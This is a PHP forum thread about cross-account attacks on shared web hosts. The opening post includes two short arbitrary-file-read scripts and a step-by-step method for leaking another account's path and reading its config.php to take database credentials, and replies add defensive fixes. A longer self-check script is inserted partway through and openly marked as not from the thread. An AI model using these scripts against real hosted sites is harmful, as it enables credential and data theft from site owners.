Security in shared web servers! be careful: everybody hack

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.


sanbad
Forum Newbie
Posts: 4
Joined: Tue Jun 07, 2005 2:17 am
Location: Iran

Security in shared web servers! be careful: everybody hack

Post by sanbad »

Hi

If your PHP portal is installed on a shared server, you must be careful.
Another user resident on your server (he has a hosting account on your server) can hack your portal!

How can he hack your portal?

By this script (script 1):

Code:

<?php
if (isset($a) )
{
echo implode("", file("$a"));
}
?>
And by this other one (script 2):

Code:

<?php

    header('Content-Type: text/plain');
    readfile($_GET['a']);

?>
With these scripts, a user resident on your server can get your files or your code; for example, he can get your config.php, see your database user, password and name, and download your data!!!

1- The hacker must know your ID on your hosting, so he requests one of the PHP files that belong to your portal in his browser,
for example:

Code:

http://www.yourwebsite.com/forum/includes/functions.php?anyfunctionIntegerArgument=text
after this request, he sees an error report like this:

Code:

/home/yourID/public_html/forum/includes/functions.php  error 607 in line 563
Now he has found your ID.

2- Now he uses one of these scripts, for example script 1, like in this case:

Code:

http://www.hackerWebsite.com/script1.php?a=/home/yourID/public_html/forum/config.php
then he views the page source and reads your DB config information!

3- By using a simple script he can download your DB, or he can write to your DB and …
He can install the same portal, edit and change some code, then use your encrypted admin password to log in, and…

How can we solve this problem?

1- We must add this code to the prologue of all PHP files:

Code:

ini_set('display_errors', 'Off');
ini_set('log_errors', 'On');
so the hacker cannot find your ID. And you can see the error log in the cPanel of your Linux hosting.

2- You must rename your config.php file and edit every PHP file that includes or requires config.php. Then you must encrypt these files using Zend PHP Encoder or any other encoder program.
So if a hacker finds your ID, he will not find your DB config file.

3- Or use a dedicated server only for yourself.


In PHP-Nuke, if NukeSentinel is used and IP tracking is on, then all users' usernames and passwords (even the admin's) are inserted into nuke_nsnst_tracked_ips!!!

So the Nuke owner or a hacker can see users' passwords.

If you want to register on portals, you must use a different password.
If your password is the same as your other important passwords, for example your email password, your domain-panel password or your bank account, a hacker or the Nuke website owner can access those!

On other portals, the owner can change the scripts' code and find your password.
MarK (CZ)
Forum Contributor
Posts: 239
Joined: Tue Apr 13, 2004 12:51 am
Location: Prague (CZ) / Vienna (A)
Contact:

Post by MarK (CZ) »

I don't think that other accounts on the same server have rights to access my folders.
Maybe on some badly supervised servers.
AshrakTheWhite
Forum Commoner
Posts: 69
Joined: Thu Feb 02, 2006 6:47 am

Post by AshrakTheWhite »

you could just hash your password
aerodromoi
Forum Contributor
Posts: 230
Joined: Sun May 07, 2006 5:21 am

Re: Security in shared web servers! be careful: everybody hack

Post by aerodromoi »

sanbad wrote: Hi

If your PHP portal is installed on a shared server, you must be careful.
Another user resident on your server (he has a hosting account on your server) can hack your portal!

How can he hack your portal?

By this script (script 1):

Code:

<?php
if (isset($a) )
{
echo implode("", file("$a"));
}
?>
And by this other one (script 2):

Code:

<?php

    header('Content-Type: text/plain');
    readfile($_GET['a']);

?>
[...]
3- Or use a dedicated server only for yourself.
Why would anybody in his or her right mind allow snippets like the ones you've posted?
Shared hosting is always a compromise - but you have to validate user input nevertheless.

btw: As for your first script - you might want to take a look at http://de2.php.net/manual/en/ini.core.p ... er-globals.
Chris Corbyn
Breakbeat Nuttzer
Posts: 13098
Joined: Wed Mar 24, 2004 7:57 am
Location: Melbourne, Australia

Post by Chris Corbyn »

It's been a known problem for some time. Hosts who know what they're doing should use CGI and suexec in order to get PHP running under the user ID of the account holder; this way you can remove the "x" execute permission from /home/<yourname> for everybody except yourself.

It would probably be a good measure to chmod all your files to remove all permissions for everybody except yourself too, if you are in a CGI/suexec setup.

I'm more than aware that some shared hosts couldn't care less about such issues, after having my own website filled with trojan code on a number of occasions before telling my company to get stuffed and getting a VDS instead :)
Chris Corbyn
Breakbeat Nuttzer
Posts: 13098
Joined: Wed Mar 24, 2004 7:57 am
Location: Melbourne, Australia

Post by Chris Corbyn »

AshrakTheWhite wrote: you could just hash your password
That won't stop people getting your MySQL details. Even if you hashed that, you'd have to use the hash to log in, so all it means is that your password is the hash, so it can still be stolen.
phppage
Forum Contributor
Posts: 126
Joined: Mon Apr 24, 2006 1:47 pm
Location: West Yorkshire, UK

Post by phppage »

Ok, I heard rumours about this, but this is a worry. Would anyone have any further detailed documents regarding protecting sites from this? Would this be a worry on bluehost.com? Any penetration tests I could try without upsetting my hosting provider?
Chris Corbyn
Breakbeat Nuttzer
Posts: 13098
Joined: Wed Mar 24, 2004 7:57 am
Location: Melbourne, Australia

Post by Chris Corbyn »

phppage wrote: Ok, I heard rumours about this, but this is a worry. Would anyone have any further detailed documents regarding protecting sites from this? Would this be a worry on bluehost.com? Any penetration tests I could try without upsetting my hosting provider?
Just check if PHP is running under your own user ID:

Code:

echo `echo \$USER`;
Benjamin
Site Administrator
Posts: 6935
Joined: Sun May 19, 2002 10:24 pm

Post by Benjamin »

I was playing around on a shared host the other day actually, in SSH.

Code:

#>updatedb
#>locate [censored] | less
etc. etc..

I notified the admin, not sure they will do anything about it though.
phppage
Forum Contributor
Posts: 126
Joined: Mon Apr 24, 2006 1:47 pm
Location: West Yorkshire, UK

Post by phppage »

d11wtq wrote:
phppage wrote: Ok, I heard rumours about this, but this is a worry. Would anyone have any further detailed documents regarding protecting sites from this? Would this be a worry on bluehost.com? Any penetration tests I could try without upsetting my hosting provider?
Just check if PHP is running under your own user ID:

Code:

echo `echo \$USER`;
I tried that, uploaded it to my website and ran it via a browser, and it displayed nothing. What would that mean?
phppage
Forum Contributor
Posts: 126
Joined: Mon Apr 24, 2006 1:47 pm
Location: West Yorkshire, UK

Post by phppage »

I get this when I try to access SSH.
SSH/Shell Access

For security reasons, shell access is not enabled by default. In order to activate shell access on your account, you will need to fax or mail a copy of your driver's license, passport or other photo id to customer service. You can fax it to +1 (801) 765-1992 or email it to support@bluehost.com
I guess that's encouraging.
Chris Corbyn
Breakbeat Nuttzer
Posts: 13098
Joined: Wed Mar 24, 2004 7:57 am
Location: Melbourne, Australia

Post by Chris Corbyn »

Hmm... you can create a file using PHP, then FTP to the server and look at who owns that file (i.e. "nobody" or "www" vs "<your name>").
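A one-file self-check that ties the thread's checks together, added here as an example and not code posted by anyone in the thread: it runs the ownership test Chris Corbyn describes (create a file, see who owns it), reports whether display_errors is still on and would reveal the /home/yourID/... path from sanbad's first post, and says whether config.php is readable by other accounts on the box. The config path is an assumption; adjust it to your layout.

```php
<?php
// Added example, not code from the thread: a one-off self-check to upload to
// your own webroot on a shared host, open once in a browser, then delete. It
// reports which account PHP runs as (Chris Corbyn's ownership test), whether
// config.php can be read by other accounts, and whether display_errors is on.
header('Content-Type: text/plain');
$configPath = __DIR__ . '/config.php';   // assumed location; adjust to your layout

function uidToName(int $uid): string {
    // posix_* is not compiled into every PHP build; fall back to the bare uid.
    $pw = function_exists('posix_getpwuid') ? posix_getpwuid($uid) : false;
    return $pw ? sprintf('%s (uid %d)', $pw['name'], $uid) : "uid $uid";
}

function uidOfNewFile(string $dir): int {
    // Create a file, note its owner, remove it: that owner is the account every
    // PHP script on this server executes as (your own uid under CGI/suexec, a
    // shared user such as nobody under plain mod_php).
    $tmp = tempnam($dir, 'owncheck');
    $uid = fileowner($tmp);
    unlink($tmp);
    return $uid;
}

function readableByOthers(string $path): bool {
    return (fileperms($path) & 0044) !== 0;   // group-read or other-read bit set
}

$phpUid = uidOfNewFile(__DIR__);
$displayErrors = filter_var(ini_get('display_errors'), FILTER_VALIDATE_BOOLEAN);
echo 'PHP scripts run as:  ' . uidToName($phpUid) . "\n";
echo 'display_errors:      ' . ($displayErrors ? 'On (error messages reveal /home/yourID/... paths)' : 'Off') . "\n";

if (!file_exists($configPath)) {
    echo "no config file at $configPath\n";
    exit;
}
$cfgUid = fileowner($configPath);
echo 'config.php owner:    ' . uidToName($cfgUid) . "\n";
if (!readableByOthers($configPath)) {
    echo "config.php is readable by its owner only; other accounts cannot read it.\n";
} elseif ($cfgUid === $phpUid) {
    echo "config.php is group/world readable, but PHP runs as its owner: chmod 0600 it.\n";
} else {
    // Plain mod_php: PHP runs as a shared user, so the file must stay readable
    // to it, and every other account's scripts run as that same user. Only the
    // host can close this (CGI/suexec); ask them, or move to a host that does.
    echo "config.php is readable by other accounts and PHP runs as a shared user.\n";
}
```

The last branch is the situation the first post describes: until the host switches to CGI/suexec, chmod alone cannot stop another account's script from reading the file.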
phppage
Forum Contributor
Posts: 126
Joined: Mon Apr 24, 2006 1:47 pm
Location: West Yorkshire, UK

Post by phppage »

I tend to get read access for Owner, Group and All Users: all have read access, but only the owner has write access, and nothing is selected for execute. However, the owner is not defined?? This is using Windows standard FTP via Network Places. Could I get more info, do you think, from a good FTP client?
phppage
Forum Contributor
Posts: 126
Joined: Mon Apr 24, 2006 1:47 pm
Location: West Yorkshire, UK

Post by phppage »

Seems like I am covered. Thanks for your help though. Weight off my mind.

http://www.bluehostforum.com/showthread.php?t=1551
RobertGonzalez
Site Administrator
Posts: 14293
Joined: Tue Sep 09, 2003 6:04 pm
Location: Fremont, CA, USA

Post by RobertGonzalez »

I am pretty sure that iPowerweb is still vulnerable to this. One of my clients got zapped a few weeks ago. I had gotten hit several times before moving away from them.